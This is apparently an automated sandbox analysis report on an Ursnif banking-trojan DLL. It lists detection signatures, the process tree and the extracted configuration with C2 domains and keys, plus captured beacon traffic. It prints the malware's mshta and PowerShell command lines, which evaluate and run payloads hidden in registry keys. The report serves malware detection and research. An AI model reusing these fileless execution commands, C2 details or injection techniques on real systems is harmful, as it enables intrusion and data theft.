Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Trojan.GenericKD.46602191.18619.30710

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.GenericKD.46602191.18619.30710 (renamed file extension from 30710 to dll)
Analysis ID:446378
MD5:f3be390b01c85970deeae124ca36ce2d
SHA1:93114ecf1b2c711ec10e1fafdc834393efc11a97
SHA256:4eef8b6a5bcd808cd0ab0e33efcea2c2f9a36abe556e56556de8550383c9d3ce
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Allocates memory in foreign processes
Compiles code for process injection (via .Net compiler)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6320 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 6328 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6348 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 1500 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 6336 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Fatreply MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6392 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Periodwait MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6416 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Seemprove MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6432 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Which MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 6188 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4824 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5648 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:82950 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6376 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:82956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 5328 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rbex='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rbex).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4652 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1836 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4728 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4013.tmp' 'c:\Users\user\AppData\Local\Temp\a5q0nxag\CSCA0E183A53BA24AF88D541EA58AA2F519.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 1472 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1t143vp1\1t143vp1.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 1380 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E4C.tmp' 'c:\Users\user\AppData\Local\Temp\1t143vp1\CSC76ED9B8CEB314CD89B53DEEDCE956C.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "48n489DADvQETiNETBHyPBGGvRa6csWtqIuLSVOWYWKKC10mrbaCDTGmXT9+yBdCxu5rsz9H10sEVOKS1YbQqCSO7vHhJ4AqplAi0EpahHSG6iAjqlB8Ka8e19eFq+oWTyXFXNaCOa1ztfMCxuyaqADn0yfjtWeuipBCZ+WgBEXPEGD6cctVIddqMNHa0kzmsNtadDWoPRLlm3WMxbPQCRP0dzRx5jDY+C8wai2SJ7DJITIcBRF1En7YoFGFEsOcJvmCr4+vI12IDpy+U6ARTXUjcxKOcCsi8f3JnvpXpMyaus8R6AAz7bUHl5rTZsgEcjzMHpe+df4LlMvsTqR94H38v4JAsBa+Wcc33Pvxw/o=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "OkOYg3xmZhahWmvv", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.831952409.0000000005899000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000002.917944713.0000000003698000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.818012728.0000000005918000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.817964029.0000000005918000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000000.00000003.872375871.0000000003698000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 17 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.3.rundll32.exe.58994a0.2.raw.unpackJoeSecurity_UrsnifYara detected UrsnifJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Encoded IEXShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rbex='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rbex).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5328, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4652
              Sigma detected: MSHTA Spawning Windows ShellShow sources
              Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rbex='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rbex).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5328, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4652
              Sigma detected: Mshta Spawning Windows ShellShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rbex='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rbex).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5328, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4652
              Sigma detected: Suspicious Csc.exe Source File FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4652, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.cmdline', ProcessId: 1836
              Sigma detected: Non Interactive PowerShellShow sources
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rbex='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rbex).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5328, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4652

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000004.00000003.744049460.0000000003140000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "48n489DADvQETiNETBHyPBGGvRa6csWtqIuLSVOWYWKKC10mrbaCDTGmXT9+yBdCxu5rsz9H10sEVOKS1YbQqCSO7vHhJ4AqplAi0EpahHSG6iAjqlB8Ka8e19eFq+oWTyXFXNaCOa1ztfMCxuyaqADn0yfjtWeuipBCZ+WgBEXPEGD6cctVIddqMNHa0kzmsNtadDWoPRLlm3WMxbPQCRP0dzRx5jDY+C8wai2SJ7DJITIcBRF1En7YoFGFEsOcJvmCr4+vI12IDpy+U6ARTXUjcxKOcCsi8f3JnvpXpMyaus8R6AAz7bUHl5rTZsgEcjzMHpe+df4LlMvsTqR94H38v4JAsBa+Wcc33Pvxw/o=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "OkOYg3xmZhahWmvv", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
              Multi AV Scanner detection for domain / URLShow sources
              Source: gtr.antoinfer.comVirustotal: Detection: 7%Perma Link
              Multi AV Scanner detection for submitted fileShow sources
              Source: SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dllVirustotal: Detection: 20%Perma Link
              Source: SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dllReversingLabs: Detection: 20%
              Source: SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
              Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
              Source: SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000017.00000002.886639113.0000020E19BA0000.00000002.00000001.sdmp, csc.exe, 00000019.00000002.894358562.000001466F560000.00000002.00000001.sdmp
              Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001B.00000000.917016181.0000000005A00000.00000002.00000001.sdmp
              Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.910017703.00000000064C0000.00000004.00000001.sdmp
              Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.910017703.00000000064C0000.00000004.00000001.sdmp
              Source: Binary string: c:\Reply-quite\Cry_Country\523\Gave\Color\shape.pdb source: loaddll32.exe, 00000000.00000002.918197086.000000006D4EC000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll
              Source: Binary string: wscui.pdb source: explorer.exe, 0000001B.00000000.917016181.0000000005A00000.00000002.00000001.sdmp
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D4E06DA FindFirstFileExW,0_2_6D4E06DA

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49751 -> 165.232.183.49:80
              Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49751 -> 165.232.183.49:80
              Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49752 -> 165.232.183.49:80
              Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49752 -> 165.232.183.49:80
              Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49757 -> 165.232.183.49:80
              Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49757 -> 165.232.183.49:80
              Source: Joe Sandbox ViewASN Name: ALLEGHENYHEALTHNETWORKUS ALLEGHENYHEALTHNETWORKUS
              Source: global trafficHTTP traffic detected: GET /6jptEA6wC8OB7/q7vTQZto/d5CchjdbRrqZ5Z6Z_2Bg1vm/WfbX13QLJh/A2YEXLOoa_2F7tRm_/2FNwBUDimj6E/uPAUHKBNpk1/VjWeByKba7dA22/iqRSzqgEmB8mQYjX5o51W/j5ZXNQEryFUoJZBW/23tsS6zCPUWYtMD/UgNU1ARyOqPJE6n7Jx/XOgl3vdma/Y9s8AjQPcJNHAV_2FpBb/lOSs_2B_2Fregn_2FdZ/VSdKs_2FcaLNlVfbwth9Oi/4Vv_2ByCuk9fd/KEhpOJmg/c26kjnO4VZB2XIIXhQgYfGA/kb61PFLJEL/EFmfSuje8R4VMH6_2/BZs_2FmiZbLkWW5Nz8ToLf/Y HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /iJicPEzpWLt9kIte6bxUGY/_2BR7ODZwRNCt/zjY2vw66/miliEkUQv2irt3ku_2FqNHB/akyqFQ_2BU/yM9SZV6ME7y_2FqkK/It7SIsAlfzad/nxZBZ52awi6/psN6Yj3z7wNsMk/xQu7epV5m4ODSAWDxLy1j/Gk_2FldXWGNOMAHD/fQa5bj6bJuGJvLC/_2BINvzSWHR8aC2WFb/3FD_2BoRU/0ETns47no1FSMZrZVvpo/oidVSWsyBZKZQ2VvZTQ/apd5gJV2bxCtRREtLzEP23/aQrm19tIQuqLU/uXn4W8I5/0vUbA5p07eFzebEv_2BENSg/QJGoAud5ASp7/0hsFWY2nQ/G HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /7Ep6sOqsiggMUz11gUp6a/qtvd4K5Z0K1BVqPW/RYWSd53MfmcNiV5/RE881azalII7Gf_2BB/LlVOlbNj6/RPZQwcj8bJhS19L7epbH/8FoJWjd_2B_2FoGw2Bm/R78HTVyDDDMhzpL_2B_2BC/NT4N_2BZc5JJ5/UVDvzetX/v8gnM8_2BpN7NJffSmXgZSS/qqPoPFwQjt/P6AxMC53uAUww_2Bc/nxUF1jZoiqDv/fS2kjrbVKTg/KntWa8B08GJbBA/JKUoQSoG69VvL_2FI3TFW/zn35_2FieOhXHllq/8OehjRVegYhlQWm/W_2BILGcprIvR338Fg/HNspl_2F5/DJjDkA4zF03Nn8/04W HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
              Source: unknownDNS traffic detected: queries for: gtr.antoinfer.com
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 09 Jul 2021 11:46:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
              Source: explorer.exe, 0000001B.00000000.918639012.0000000006AD0000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
              Source: explorer.exe, 0000001B.00000000.918639012.0000000006AD0000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
